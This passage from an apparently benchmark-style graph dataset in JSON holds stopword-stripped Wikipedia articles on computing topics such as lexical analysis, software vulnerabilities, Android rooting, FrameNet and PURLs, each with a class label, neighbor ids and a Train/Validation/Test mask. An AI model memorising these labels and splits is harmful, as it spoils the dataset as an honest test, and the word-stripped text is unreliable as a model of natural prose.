lexer generators produce faster lexers hand-coded ones lex/flex family generators uses table-driven approach much less efficient directly coded approach latter approach generator produces engine directly jumps follow-up states via goto statements tools like re2c proven produce engines two three times faster flex produced engines general difficult hand-write analyzers perform better engines generated latter tools following lexical analysers handle unicode lexical analysis mainly segments input stream characters tokens simply grouping characters pieces categorizing however lexing may significantly complex simply lexers may omit tokens insert added tokens omitting tokens notably whitespace comments common needed compiler less commonly added tokens may inserted done mainly group tokens statements statements blocks simplify parser line continuation feature languages newline normally statement terminator often ending line backslash immediately followed newline results line continued – following line joined prior line generally done lexer backslash newline discarded rather newline tokenized examples include bash shell scripts python many languages use semicolon statement terminator often mandatory languages semicolon optional many contexts mainly done lexer level lexer outputs semicolon token stream despite one present input character stream termed semicolon insertion automatic semicolon insertion cases semicolons part formal phrase grammar language may found input text inserted lexer optional semicolons terminators separators also sometimes handled parser level notably case trailing commas semicolons semicolon insertion feature bcpl distant descendant go though absent b c. semicolon insertion present javascript though rules somewhat complex much-criticized avoid bugs recommend always using semicolons others use initial semicolons termed defensive semicolons start potentially ambiguous statements semicolon insertion languages semicolon-terminated statements line continuation languages newline-terminated statements seen complementary semicolon insertion adds token even though newlines generally generate tokens line continuation prevents token generated even though newlines generally generate tokens off-side rule blocks determined indenting implemented lexer python increasing indenting results lexer emitting indent token decreasing indenting results lexer emitting dedent token tokens correspond opening brace codice_7 closing brace codice_8 languages use braces blocks means phrase grammar depend whether braces indenting used requires lexer hold state namely current indent level thus detect changes indenting changes thus lexical grammar context-free indent–dedent depend contextual information prior indent level generally lexical grammars context-free almost thus require looking back ahead backtracking allows simple clean efficient implementation also allows simple one-way communication lexer parser without needing information flowing back lexer exceptions however simple examples include semicolon insertion go requires looking back one token concatenation consecutive string literals python requires holding one token buffer emitting see next token another string literal off-side rule python requires maintaining count indent level indeed stack indent level examples require lexical context complicate lexer somewhat invisible parser later phases complex example lexer hack c token class sequence characters determined semantic analysis phase since typedef names variable names lexically identical constitute different token classes thus hack lexer calls semantic analyzer say symbol table checks sequence requires typedef name case information must flow back parser semantic analyzer back lexer complicates design",
    "neighbors": [
      512,
      8323,
      3462,
      8582,
      5896,
      2316,
      10510,
      9871,
      5904,
      5651,
      2582,
      2327,
      5399,
      9881,
      1435,
      3229,
      797,
      3998,
      1952,
      6047,
      10145,
      3876,
      5925,
      2599,
      3624,
      8874,
      9002,
      10668,
      10160,
      8627,
      3127,
      7612,
      6335,
      4674,
      963,
      1349,
      8262,
      9926,
      6472,
      3402,
      5585,
      6102,
      479,
      8289,
      6242,
      7805,
      1894,
      8677,
      9062,
      8554,
      3051,
      7022,
      3313,
      9714,
      8440,
      2045,
      1535
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5636,
    "label": 4,
    "text": "Vulnerability_(computing):vulnerability computing computer security vulnerability weakness exploited threat actor attacker perform unauthorized actions within computer system exploit vulnerability attacker must least one applicable tool technique connect system weakness frame vulnerability also known attack surface vulnerability management cyclical practice identifying classifying remediating mitigating vulnerabilities practice generally refers software vulnerabilities computing systems security risk often incorrectly classified vulnerability use vulnerability meaning risk lead confusion risk potential significant impact resulting exploit vulnerability vulnerabilities without risk example affected asset value vulnerability one known instances working fully implemented attacks classified exploitable vulnerability—a vulnerability exploit exists window vulnerability time security hole introduced manifested deployed software access removed security fix available/deployed attacker disabled—see zero-day attack security bug security defect narrower concept vulnerabilities related software hardware site personnel vulnerabilities examples vulnerabilities software security bugs constructs programming languages difficult use properly large source vulnerabilities iso 27005 defines vulnerability asset anything value organization business operations continuity including information resources support organization mission ietf rfc 4949 vulnerability committee national security systems united states america defined vulnerability cnss instruction 4009 dated 26 april 2010 national information assurance glossary many nist publications define vulnerability context different publications fismapedia term provide list sp 800-30 give broader one enisa defines vulnerability open group defines vulnerability factor analysis information risk fair defines vulnerability according fair vulnerability related control strength i.e strength control compared standard measure force threat capabilities i.e probable level force threat agent capable applying asset isaca defines vulnerability risk framework data computer security dictionary standards concepts terms authors dennis longley michael shain stockton press defines vulnerability matt bishop dave bailey give following definition computer vulnerability national information assurance training education center defines vulnerability resource either physical logical may one vulnerabilities exploited threat agent threat action result potentially compromise confidentiality integrity availability resources necessarily vulnerable one belonging organization and/or parties involved customers suppliers so-called cia triad basis information security attack active attempts alter system resources affect operation compromising integrity availability passive attack attempts learn make use information system affect system resources compromising confidentiality owasp see figure depicts phenomenon slightly different terms threat agent attack vector exploits weakness vulnerability system related security controls causing technical impact resource asset connected business impact overall picture represents risk factors risk scenario set policies concerned information security management information security management system isms developed manage according risk management principles countermeasures order ensure security strategy set following rules regulations applicable country countermeasures also called security controls applied transmission information called security services vulnerabilities classified according asset class related research shown vulnerable point information systems human user operator designer human humans considered different roles asset threat information resources social engineering increasing security concern impact security breach high fact managers upper management easily know systems applications vulnerabilities perform action manage risk seen misconduct legislations privacy law forces managers act reduce impact likelihood security risk information technology security audit way let independent people certify environment managed properly lessen responsibilities least demonstrated good faith penetration test form verification weakness countermeasures adopted organization white hat hacker tries attack organization information technology assets find easy difficult compromise security proper way professionally manage risk adopt information security management system iso/iec 27002 risk follow according security strategy set forth upper management one key concept information security principle defence depth i.e set multilayer defence system intrusion detection system example class systems used detect attacks physical security set measures protect physically information asset somebody get physical access information asset quite easy make resources unavailable legitimate users sets criteria satisfied computer operating system applications order meet good security level developed itsec common criteria two examples responsible disclosure many refer 'coordinated disclosure first biased word vulnerabilities topic great debate reported tech herald august 2010 google microsoft tippingpoint rapid7 recently issued guidelines statements addressing deal disclosure going forward responsible disclosure first alerts affected vendors confidentially alerting cert two weeks later grants vendors another 45-day grace period publishing security advisory full disclosure done details vulnerability publicized perhaps intent put pressure software procedure authors find fix urgently well respected authors published books vulnerabilities exploit good example security researchers catering needs cyberwarfare cybercrime industry stated approach provide adequate income efforts instead offer exploits privately enable zero day attacks never ending effort find new vulnerabilities fix called computer insecurity january 2014 google revealed microsoft vulnerability microsoft released patch fix microsoft representative called coordinated practices among software companies revealing disclosures mitre corporation maintains list disclosed vulnerabilities system called common vulnerabilities exposures vulnerability classified scored using common vulnerability scoring system cvss owasp collects list potential vulnerabilities aim educating system designers programmers therefore reducing likelihood vulnerabilities written unintentionally software time disclosure vulnerability defined differently security community industry commonly referred kind public disclosure security information certain party usually vulnerability information discussed mailing list published security web site results security advisory afterward time disclosure first date security vulnerability described channel disclosed information vulnerability fulfill following requirement many software tools exist aid discovery sometimes removal vulnerabilities computer system though tools provide auditor good overview possible vulnerabilities present replace human judgment relying solely scanners yield false positives limited-scope view problems present system vulnerabilities found every major operating system including windows macos various forms unix linux openvms others way reduce chance vulnerability used system constant vigilance including careful system maintenance e.g applying software patches best practices deployment e.g use firewalls access controls auditing development throughout deployment lifecycle vulnerabilities related evident pure technical approach even protect physical assets one administrative procedure let maintenance personnel enter facilities people adequate knowledge procedures motivated follow proper care see social engineering security four examples vulnerability exploits common types software flaws lead vulnerabilities include set coding guidelines developed large number static code analysers used verify code follows guidelines",
    "neighbors": [
      1024,
      10756,
      8200,
      2569,
      522,
      1553,
      9746,
      8212,
      4117,
      3094,
      535,
      10264,
      1567,
      9761,
      3619,
      2084,
      4133,
      4644,
      7717,
      8231,
      11609,
      3629,
      5682,
      2611,
      6707,
      8754,
      5176,
      3643,
      7228,
      7739,
      9791,
      1088,
      4165,
      1608,
      3657,
      8779,
      9293,
      4689,
      8273,
      10836,
      89,
      8281,
      4703,
      8288,
      2147,
      612,
      2148,
      4198,
      5221,
      1640,
      1129,
      2152,
      107,
      3178,
      5226,
      7787,
      8815,
      9841,
      10867,
      1140,
      2164,
      3700,
      119,
      3704,
      4212,
      10872,
      10875,
      3708,
      4733,
      5113,
      3711,
      5245,
      5246,
      642,
      8320,
      5764,
      11401,
      2187,
      9356,
      6797,
      2190,
      5774,
      4240,
      6288,
      11409,
      4755,
      5780,
      2709,
      1688,
      10392,
      7324,
      2717,
      9375,
      10717,
      10915,
      5284,
      2213,
      10718,
      1193,
      7337,
      10412,
      1711,
      7855,
      2737,
      8881,
      9395,
      9904,
      2742,
      6326,
      8886,
      11446,
      2238,
      3262,
      711,
      7368,
      3789,
      5325,
      10959,
      1232,
      4304,
      3796,
      2262,
      6360,
      3290,
      4314,
      9435,
      4830,
      3807,
      736,
      9439,
      2275,
      1764,
      5349,
      1254,
      6373,
      10467,
      10477,
      9460,
      5877,
      7926,
      8292,
      1275,
      10492,
      5373,
      5886,
      2815,
      3843,
      10502,
      1803,
      3852,
      7436,
      8971,
      8975,
      9488,
      11022,
      8978,
      4883,
      10003,
      11537,
      7449,
      4892,
      5404,
      5408,
      1314,
      4389,
      8998,
      8488,
      8489,
      7979,
      11052,
      3886,
      815,
      3887,
      817,
      5934,
      7983,
      9518,
      10034,
      10036,
      823,
      11567,
      5433,
      11569,
      2878,
      3395,
      11594,
      331,
      4945,
      4435,
      4948,
      6484,
      10070,
      4439,
      857,
      1369,
      1882,
      3419,
      4956,
      4957,
      5469,
      4448,
      5470,
      6497,
      7515,
      3941,
      7526,
      3944,
      7528,
      11112,
      10092,
      877,
      2926,
      8045,
      8047,
      1907,
      3956,
      5492,
      3447,
      1912,
      6520,
      7545,
      7547,
      9082,
      2430,
      3969,
      899,
      7044,
      9607,
      6537,
      2446,
      4494,
      4496,
      3473,
      11152,
      10132,
      1429,
      6550,
      11157,
      3482,
      8094,
      2975,
      1440,
      5024,
      1954,
      8612,
      2470,
      11175,
      4521,
      939,
      5547,
      9646,
      3503,
      7601,
      1970,
      441,
      1979,
      4027,
      6588,
      8637,
      11198,
      8640,
      1474,
      11202,
      3525,
      1479,
      9160,
      10190,
      4562,
      4054,
      5078,
      9688,
      9181,
      4062,
      4063,
      1504,
      3552,
      5087,
      3555,
      7135,
      1509,
      7139,
      999,
      9186,
      11244,
      10221,
      2542,
      4081,
      2041,
      507,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 5637,
    "label": 2,
    "text": "Rooting_(Android):rooting android rooting process allowing users smartphones tablets devices running android mobile operating system attain privileged control known root access various android subsystems android uses linux kernel rooting android device gives similar access administrative superuser permissions linux unix-like operating system freebsd macos rooting often performed goal overcoming limitations carriers hardware manufacturers put devices thus rooting gives ability permission alter replace system applications settings run specialized applications apps require administrator-level permissions perform operations otherwise inaccessible normal android user android rooting also facilitate complete removal replacement device operating system usually recent release current operating system root access sometimes compared jailbreaking devices running apple ios operating system however different concepts jailbreaking bypass several types apple prohibitions end user including modifying operating system enforced locked bootloader installing non-officially approved available google play applications via sideloading granting user elevated administration-level privileges rooting many vendors htc sony asus google explicitly provide ability unlock devices even replace operating system entirely similarly ability sideload applications typically permissible android devices without root permissions thus primarily third aspect ios jailbreaking giving users administrative privileges directly correlates android rooting rooting lets user-installed applications run privileged commands typically unavailable devices stock configuration rooting required advanced potentially dangerous operations including modifying deleting system files removing pre-installed applications low-level access hardware rebooting controlling status lights recalibrating touch inputs typical rooting installation also installs superuser application supervises applications granted root superuser rights requesting approval user granting said permissions secondary operation unlocking device bootloader verification required remove replace installed operating system contrast ios jailbreaking rooting needed run applications distributed outside google play store sometimes called sideloading android os supports feature natively two ways unknown sources option settings menu android debug bridge however us carriers including prevented installation applications play store firmware although several devices subject rule including samsung infuse 4g lifted restriction devices middle 2011. amazon kindle fire defaults amazon appstore instead google play though like android devices kindle fire allows sideloading applications unknown sources easy installer application amazon appstore makes easy vendors android devices may look sources future access alternate apps may require rooting rooting always necessary rooting android phone lets owner add edit delete system files turn lets perform various tweaks use apps require root access advantages rooting include possibility complete control look feel device superuser access device system files aspects operating system customized real limitation level coding expertise immediately expectable advantages rooted devices include following rooting methods involve use command prompt development interface called android debug bridge adb methods may use specialized applications simple clicking one button devices sometimes even different variants device different hardware configurations thus guide rom root method used device variant different hardware setup risk bricking device recent years new method rooting android devices called systemless root systemless root uses various techniques gain root access without modifying system partition device one example magisk also ability hide root access applications refuse work safetynet protected applications like android pay pokémon go distinction soft rooting third-party application uses security vulnerability root exploit hard-rooting flashing codice_1 binary executable sometimes made phone soft rooted vulnerable malware process rooting varies widely device usually includes exploiting one security bugs firmware i.e. version android os installed device exploit discovered custom recovery image skip digital signature check firmware updates flashed modified firmware update typically includes utilities needed run apps root installed example codice_1 binary open-source one paired superuser supersu application copied location current process path e.g. codice_3 granted executable permissions codice_4 command third-party supervisor application like superuser supersu regulate log elevated permission requests applications many guides tutorials automatic processes exist popular android devices facilitating fast easy rooting process process rooting device may simple complex even may depend upon serendipity example shortly release htc dream htc g1 discovered anything typed using keyboard interpreted command privileged root shell although google quickly released patch fix signed image old firmware leaked gave users ability downgrade use original exploit gain root access manufacturers including lg htc motorola provide official support unlocking bootloader allows rooting without exploiting vulnerability however support may limited certain phones example lg released bootloader unlock tool certain models phones google-branded android google nexus line devices boot-loader unlocked simply connecting device computer boot-loader mode running fastboot protocol command codice_5 accepting warning boot-loader unlocked new system image written directly flash without need exploit past many manufacturers tried make non-rootable phones elaborate protections like droid x usually still rootable way may root exploit available new recently updated phones one usually available within months 2010 tablet smartphone manufacturers well mobile carriers mainly unsupportive third-party firmware development manufacturers expressed concern improper functioning devices running unofficial software related support costs moreover firmware omnirom cyanogenmod sometimes offer features carriers would otherwise charge premium tethering due technical obstacles locked bootloaders restricted access root permissions commonly introduced many devices example late december 2011 barnes noble amazon.com inc. began pushing automatic over-the-air firmware updates 1.4.1 nook tablets 6.2.1 kindle fires removed one method gain root access devices nook tablet 1.4.1 update also removed users ability sideload apps sources official barnes noble app store without modding however community-developed software began grow popular late 2009 early 2010 following statement copyright office librarian congress us allowing use jailbroken mobile devices manufacturers carriers softened position regarding cyanogenmod unofficial firmware distributions manufacturers including htc samsung motorola sony mobile communications actively provide support encourage development 2011 need circumvent hardware restrictions install unofficial firmware lessened increasing number devices shipped unlocked unlockable bootloaders similar nexus series phones device manufacturer htc announced would support aftermarket software developers making bootloaders new devices unlockable however carriers verizon wireless recently continuously blocked oems htc motorola releasing retail devices unlocked bootloaders opting instead developer edition devices sold unsubsidized off-contract similar practice nexus devices premium contract discounts 2014 samsung released security service called knox tool prevents modifying system boot files attempts set e-fuse 0x1 permanently voiding warranty international treaties influenced development laws affecting rooting 1996 world intellectual property organization wipo copyright treaty requires nations party treaties enact laws drm circumvention american implementation digital millennium copyright act dmca includes process establishing exemptions non-copyright-infringing purposes rooting 2001 european copyright directive implemented treaty europe requiring member states european union implement legal protections technological protection measures copyright directive includes exceptions allow breaking measures non-copyright-infringing purposes run alternative software member states vary implementation directive 2010 electronic frontiers australia said unclear whether rooting legal australia anti-circumvention laws may apply laws strengthened copyright amendment act 2006 november 2012 canada amended copyright act new provisions prohibiting tampering digital locks exceptions including software interoperability rooting device run alternative software form circumventing digital locks purpose software interoperability several efforts 2008 2011 amend copyright act bill c-60 bill c-61 bill c-32 prohibit tampering digital locks along initial proposals c-11 restrictive bills set aside 2011 michael geist canadian copyright scholar cited iphone jailbreaking non-copyright-related activity overly-broad copyright act amendments could prohibit free software foundation europe argues legal root flash device according european directive 1999/44/ec replacing original operating system another void statutory warranty covers hardware device two years unless seller prove modification caused defect law copyright related rights regulations 2003 makes circumventing drm protection measures legal purpose interoperability copyright infringement rooting may form circumvention covered law tested court competition laws may also relevant see also european union section india copyright law permits circumventing drm non-copyright-infringing purposes indian parliament introduced bill including drm provision 2010 passed 2012 copyright amendment bill 2012 india signatory wipo copyright treaty requires laws drm circumvention listed us special 301 report priority watch list applied pressure develop stricter copyright laws line wipo treaty new zealand copyright law allows circumvention technological protection measure tpm long use legal non-copyright-infringing purposes law added copyright act 1994 part copyright new technologies amendment act 2008 rooting might legal singapore done provide interoperability circumvent copyright tested court unlocking consumer choice wireless competition act guarantees consumers unlock let others unlock phones digital millennium copyright act dmca rooting illegal united states except exemption u.s copyright office granted exemption law least 2015 2010 response request electronic frontier foundation u.s copyright office explicitly recognized exemption dmca permit rooting ruling library congress affirmed july 26 2010 rooting exempt dmca rules respect circumventing digital locks dmca exemptions must reviewed renewed every three years else expire october 28 2012 us copyright office updated exemption policies rooting smartphones continues legal circumvention accomplished sole purpose enabling interoperability lawfully obtained software applications computer programs telephone handset however u.s copyright office refused extend exemption tablets arguing term tablets broad ill-defined exemption class devices could unintended side effects copyright office also renewed 2010 exemption unofficially unlocking phones use unapproved carriers restricted exemption phones purchased january 26 2013 tim wu professor columbia law school argued 2007 jailbreaking legal ethical plain fun wu cited explicit exemption issued library congress 2006 personal unlocking notes locks used wireless carriers limit ability subscribers switch carriers business decision nothing whatsoever interests protected copyright thus implicate dmca wu claim exemption applies help others unlock device traffic software 2010 2012 u.s copyright office approved exemptions dmca allow users root devices legally still possible employ technical countermeasures prevent rooting prevent rooted phones functioning also unclear whether legal traffic tools used make rooting easy",
    "neighbors": [
      516,
      9732,
      6,
      8719,
      7700,
      9244,
      11294,
      1578,
      3626,
      7722,
      5677,
      1083,
      1602,
      6212,
      69,
      8262,
      4685,
      3664,
      8280,
      3162,
      8285,
      2658,
      6763,
      11391,
      1670,
      9356,
      5262,
      10393,
      7835,
      6301,
      673,
      8870,
      1191,
      700,
      196,
      8907,
      2259,
      8413,
      9949,
      1255,
      8940,
      4334,
      5875,
      5892,
      7428,
      5397,
      280,
      10009,
      10525,
      798,
      288,
      2852,
      8486,
      10537,
      3380,
      823,
      5431,
      2875,
      3900,
      10045,
      7492,
      11082,
      332,
      3409,
      8019,
      2901,
      5467,
      4957,
      3940,
      7548,
      4995,
      9610,
      3473,
      5522,
      1427,
      10129,
      10645,
      7579,
      6561,
      2978,
      1959,
      937,
      5546,
      7595,
      2001,
      479,
      1516,
      5100,
      1524,
      11252,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 5638,
    "label": 2,
    "text": "XMK_(operating_system):xmk operating system extreme minimal kernel xmk real-time operating system rtos designed minimal ram/rom use achieves goal though almost entirely written c programming language consequence easily ported 8- 16- 32-bit microcontroller xmk comes two independent packages xmk scheduler contains core kernel everything necessary run multithreaded embedded application application programming layer apl provides higher level functions atop xmk scheduler api xmk distribution contains standard libraries libc part development tools target systems",
    "neighbors": [
      8262,
      7983,
      9366,
      2045,
      6207
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5639,
    "label": 0,
    "text": "FrameNet:framenet computational linguistics framenet project housed international computer science institute berkeley california produces electronic resource based theory meaning called frame semantics framenet reveals example sentence john sold car mary essentially describes basic situation semantic frame mary bought car john different perspective semantic frame thought conceptual structure describing event relation object participants framenet lexical database contains 1,200 semantic frames 13,000 lexical units pairing word meaning polysemous words represented several lexical units 202,000 example sentences framenet largely creation charles j. fillmore developed theory frame semantics project based initially project leader project began 1997 collin baker became project manager 2000 framenet project influential linguistics natural language processing led task automatic semantic role labeling frame schematic representation situation involving various participants props conceptual roles examples frame names codice_1 codice_2 frame framenet contains textual description represents frame definition associated frame elements lexical units example sentences frame-to-frame relations frame elements fe provide additional information semantic structure sentence frame number core non-core fes thought semantic roles core fes essential meaning frame non-core fes generally descriptive time place manner etc. examples include framenet includes shallow data syntactic roles frame elements play example sentences example sentence like born ad 460 framenet would mark noun phrase referring codice_4 fe ad 460 noun phrase corresponding codice_5 frame element details frame elements realized sentence important reveals important information subcategorization frames well possible diathesis alternations e.g john broke window vs. window broke verb lexical units lu lemmas part speech evoke specific frame words lu identified sentence specific lu associated specific frame frame many lus associated one frame many frames share multiple lus typically case lus multiple word senses alongside frame lexical unit associated specific frame elements means annotated example sentences example lexical units evoke codice_16 frame specific perspectivized versions precise include verbs complain grouse lament others frames associated example sentences frame elements marked within sentences thus sentence associated frame codice_1 marked frame element codice_4 ad 460 marked codice_5 start framenet project committed looking evidence actual language use found text collections like british national corpus based example sentences automatic semantic role labeling tools able determine frames mark frame elements new sentences framenet also exposes statistics valences frames number position frame elements within example sentences sentence falls valence pattern occurs two times example sentences framenet namely framenet additionally captures relationships different frames using relations include following framenet proven useful number computational applications computers need additional knowledge order recognize john sold car mary mary bought car john describe essentially situation despite using two quite different verbs different prepositions different word order framenet used applications like question answering paraphrasing recognizing textual entailment information extraction either directly means semantic role labeling tools first automatic system semantic role labeling srl sometimes also referred shallow semantic parsing developed daniel gildea daniel jurafsky based framenet 2002 semantic role labeling since become one standard tasks natural language processing latest version 1.7 framenet fully supported natural language toolkit since frames essentially semantic descriptions similar across languages several projects arisen years relied original framenet basis additional non-english framenets spanish japanese german polish among others",
    "neighbors": [
      416,
      3617,
      1890,
      5667,
      8323,
      9577,
      396,
      2414,
      10610,
      11538,
      2100,
      9149,
      6174
    ],
    "mask": "None"
  },
  {
    "node_id": 5640,
    "label": 1,
    "text": "MemSQL:memsql memsql distributed in-memory sql database management system relational database management system rdbms compiles structured query language sql machine code via termed code generation april 23 2013 memsql launched first generally available version database public fast database memsql combines lock-free data structures just-in-time compilation jit process highly volatile workloads specifically memsql implements lock-free hash tables lock-free skip lists memory fast random access data sql queries sent memsql server converted byte code compiled llvm machine code queries stripped parameters query template stored shared object subsequently matched incoming queries system executing pre-compiled query plans removes interpretation along hot code paths providing highly efficient code paths minimize number central processing unit cpu instructions required process sql statements memsql wire-compatible mysql means applications connect memsql mysql clients drivers well standard open database connectivity odbc java database connectivity jdbc connectors addition mysql syntax functionality memsql also store columns json format supports geospatial datatypes operations memsql store database tables either rowstores columnstores format used determined user ddl time i.e table created data rowstore tables stored completely in-memory snapshots transaction logs persisted disk data columnstore tables stored on-disk using rowstore-like structure handle incoming inserts columnstore rowstore columnstore tables differ storage medium used rowstores name implies store information row format traditional data format used rdbms systems rowstores optimized singleton small insert update delete queries closely associated oltp transactional use cases columnstores optimized complex select queries typically associated olap analytics use cases example large clinical data set data analysis best stored columnar format since queries run typically ad-hoc queries aggregates computed large numbers similar data items memsql database distributed database implemented aggregators leaf nodes memsql binaries used aggregator leaf nodes nearly difference user identifying node aggregator leaf aggregator responsible receiving sql queries breaking across leaf nodes aggregating results back client leaf node stores memsql data processes queries aggregator communication aggregators leaf nodes done network sql syntax memsql uses hash partitioning distribute data uniformly across number leaf nodes memsql durability slightly different in-memory rowstore on-disk columnstore durability in-memory rowstore implemented write-ahead log snapshots similar checkpoints default settings soon transaction acknowledged memory database asynchronously write transaction disk fast disk allows on-disk columnstore actually fronted in-memory rowstore-like structure skiplist structure durability guarantees memsql rowstore apart columnstore durable since data stored disk memsql cluster configured high availability mode every data partition automatically created master slave versions two separate leaf nodes high availability mode aggregators send transactions master partitions send logs slave partitions event unexpected master failure slave partitions take master partitions fully online operation memsql ships installation management monitoring tool called memsql ops installing memsql ops used set distributed memsql database across machines provide metrics running system memsql ops web user interface command line interface starting memsql 4.1 launched september 2015 memsql gives users ability install apache spark part memsql cluster use spark etl tool import data memsql apache spark installed set interactively using memsql ops ops users define extract transform load phases data pipeline import data memsql management monitoring running data pipelines done within ops ui",
    "neighbors": [
      3,
      3219,
      10389,
      1952,
      8609,
      4781,
      10286,
      7983,
      10413,
      823,
      5691,
      6470,
      2901,
      4696,
      8810,
      7022,
      1776,
      7412,
      7421
    ],
    "mask": "None"
  },
  {
    "node_id": 5641,
    "label": 5,
    "text": "Persistent_uniform_resource_locator:persistent uniform resource locator persistent uniform resource locator purl uniform resource locator url i.e. location-based uniform resource identifier uri used redirect location requested web resource purls redirect http clients using http status codes purl concept generic used designate redirection service named purl resolver purls used curate url resolution process thus solving problem transitory uris location-based uri schemes like http technically string resolution purl like sef url resolution remainder article oclc purl system proposed implemented oclc online computer library center purl concept developed oclc 1995 purl system implemented using forked pre-1.0 release apache http server software modernized extended 2007 zepheira contract oclc official website moved http //purlz.org z came zepheira name used differentiate purl open-source software site purl resolver operated oclc purl version numbers may considered confusing oclc released versions 1 2 apache-based source tree initially 1999 oclc research public license 1.0 license later oclc research public license 2.0 license http //opensource.org/licenses/oclc2 zepheira released purlz 1.0 2007 apache license version 2.0 purlz 2.0 released beta testing 2010 release never finalized callimachus project implemented purls 1.0 release 2012 oldest purl http resolver operated oclc 1995 september 2016 reached purl.oclc.org well purl.org purl.net purl.com notable purl resolvers include us government printing office http //purl.fdlp.gov operated federal depository library program operation since 1997 purl concept used w3id.org may replace old purl-services purl-technologies 27 september 2016 oclc announced cooperation internet archive resulting transfer resolver service administration interface internet archive service supported newly created software separate previous implementations transfer reenabled ability manage purl definitions disabled oclc hosted service several months service hosted internet archive servers supports access via purl.org purl.net purl.info purl.com oclc redirecting dns requests purl.oclc.org purl.org purl concept allows generalized url curation http uris world wide web purls allow third party control url resolution resource metadata provision url simply address resource world wide web persistent url address world wide web causes redirection another web resource web resource changes location hence url purl pointing updated user purl always uses web address even though resource question may moved purls may used publishers manage information space web users manage purl service independent publisher information purl services thus allow management hyperlink integrity hyperlink integrity design trade-off world wide web may partially restored allowing resource users third parties influence url resolves simple purl works responding http get request returning response type 302 equivalent http status code 302 meaning found response contains http location header value url client subsequently retrieve via new http get request purls implement one form persistent identifier virtual resources persistent identifier schemes include digital object identifiers dois life sciences identifiers lsids persistent identification schemes provide unique identifiers possibly changing virtual resources schemes provide curation opportunities curation virtual resources defined active involvement information professionals management including preservation digital data future use purls criticized need resolve url thus tying purl network location network locations several vulnerabilities domain name system registrations host dependencies failure resolve purl could lead ambiguous state would clear whether purl failed resolve network failure prevented exist purls valid urls components must map url specification scheme part tells computer program web browser protocol use resolving address scheme used purls generally http host part tells purl server connect next part purl domain analogous resource path url domain hierarchical information space separates purls allows purls different maintainers one designated maintainers may administer purl domain finally purl name name purl domain name together constitute purl id permalink purl used permanent/persistent url redirect location requested web resource roughly speaking differences domain name time scale common types purls named coincide http response code return http response codes equivalent purl types purl servers implement purl types http response codes e.g 401 unauthorized clear meanings context http conversation apply process http redirection three additional types purls chain partial clone given mnemonic names related functions purls so-called simple purls provide redirection desired resource http status code hence purl type simple purl 302 intent 302 purl inform web client end user purl always used address requested resource final uri resolved allow continued resolution resource purl changes operators prefer use purls type 301 indicating final uri addressed future requests purl type chain allows purl redirect another purl manner identical 301 302 redirection difference purl server handle redirection internally greater efficiency efficiency useful many redirections possible since web browsers stop following redirections set limit encountered attempt avoid loops purl type 200 active purl purl actively participates creation aggregation metadata returned active purl includes arbitrary computation produce output active purls implemented purlz 2.0 callimachus project may used gather runtime status reports perform distributed queries type data collection persistent identifier desired active purls act similar stored procedure relational databases purl type 303 used direct web client resource provides additional information regarding resource requested without returning resource subtlety useful http uri requested used identifier physical conceptual object represented information resource purls type 303 used often redirect metadata serialization format resource description framework rdf relevance semantic web linked data content use 303 http status code conformant http-range-14 finding technical architecture group world wide web consortium purl type 307 informs user resource temporarily resides different url norm purls types 404 410 note requested resource could found suggests information support http 307 temporary redirect 404 found 410 gone response codes provided completeness purls types 404 410 provided assist administrators marking purls require repair purls types allow efficient indications resource identification failure target resources moved suitable replacement identified purls type clone used solely purl administration convenient method copying existing purl record new purl purl service includes concept known partial redirection request match purl exactly requested url checked determine contiguous front portion purl string matches registered purl redirection occurs remainder requested url appended target url example consider purl url nowiki http//purl.org/some/path/ /nowiki target url nowiki http //example.com/another/path/ /nowiki attempt perform http get operation url nowiki http//purl.org/some/path/and/some/more/data /nowiki would result partial redirection nowiki http //example.com/another/path/and/some/more/data /nowiki concept partial redirection allows hierarchies web-based resources addressed via purls without resource requiring purl one purl sufficient serve top-level node hierarchy single target server new purl service uses type partial denote purl performs partial redirection partial redirections level url path violate common interpretations http 1.1 specification however handling url fragments across redirections standardized consensus yet emerged fragment identifiers indicate pointer specific information within resource designated following separator uris partial redirection presence fragment identifier problematic two conflicting interpretations possible fragment attached purl type partial purl service assume fragment meaning target url discard presumption resource changed location may also changed content thus invalidating fragments defined earlier bos suggested fragments retained passed target urls http redirections resulting 300 multiple choice 301 moved permanently 302 found 303 see responses unless designated target url already includes fragment identifier fragment identifier already present target url fragment original url abandoned unfortunately bos ’ suggestion failed navigate ietf standards track expired without work dubost et al resurrected bos ’ suggestions w3c note standard guidance absence standard makers web clients browsers generally failed follow bos ’ guidance starting purlz 1.0 series purl service implements partial redirections inclusive fragment identifiers writing fragments onto target urls attempt comply avoid problematic inconsistent behavior browser vendors",
    "neighbors": [
      2016,
      865,
      2945,
      7370,
      5403,
      6002,
      5012,
      53,
      10102,
      119,
      10452,
      1723,
      124
    ],
    "mask": "Test"
  },
  {
    "node_id": 5642,
    "label": 3,
    "text": "RAD750:rad750 rad750 radiation-hardened single board computer manufactured bae systems electronics intelligence support successor rad6000 rad750 use high radiation environments experienced board satellites spacecraft rad750 released 2001 first units launched space 2005 cpu 10.4 million transistors order magnitude rad6000 1.1 million manufactured using either 250 150 nm photolithography die area 130 mm core clock 110 200 mhz process 266 mips cpu include extended l2 cache improve performance cpu withstand 200,000 1,000,000 rads 2,000 10,000 gray temperature ranges –55 °c 125 °c requires 5 watts power standard rad750 single-board system cpu motherboard withstand 100,000 rads 1,000 gray temperature ranges –55 °c 70 °c requires 10 watts power rad750 system price comparable rad6000 us 200,000 per board per 2002 reference however customer program requirements quantities greatly affect final unit costs rad750 based powerpc 750 packaging logic functions completely compatible powerpc 7xx family term rad750 registered trademark bae systems information electronic systems integration inc 2010 reported 150 rad750s used variety spacecraft notable examples order launch date include",
    "neighbors": [
      9857,
      6914,
      4868,
      10501,
      3846,
      4743,
      6663,
      1548,
      1933,
      398,
      3472,
      4881,
      7065,
      1563,
      1309,
      3493,
      6949,
      6311,
      8102,
      1321,
      9391,
      10543,
      4017,
      5297,
      8120,
      6715,
      9020,
      1725,
      1983,
      1985,
      8899,
      10180,
      336,
      8530,
      3540,
      342,
      9302,
      11613,
      6878,
      1635,
      8931,
      869,
      10214,
      10985,
      10734,
      7151,
      1776,
      3185,
      4211,
      5235,
      8058,
      3323,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 5643,
    "label": 2,
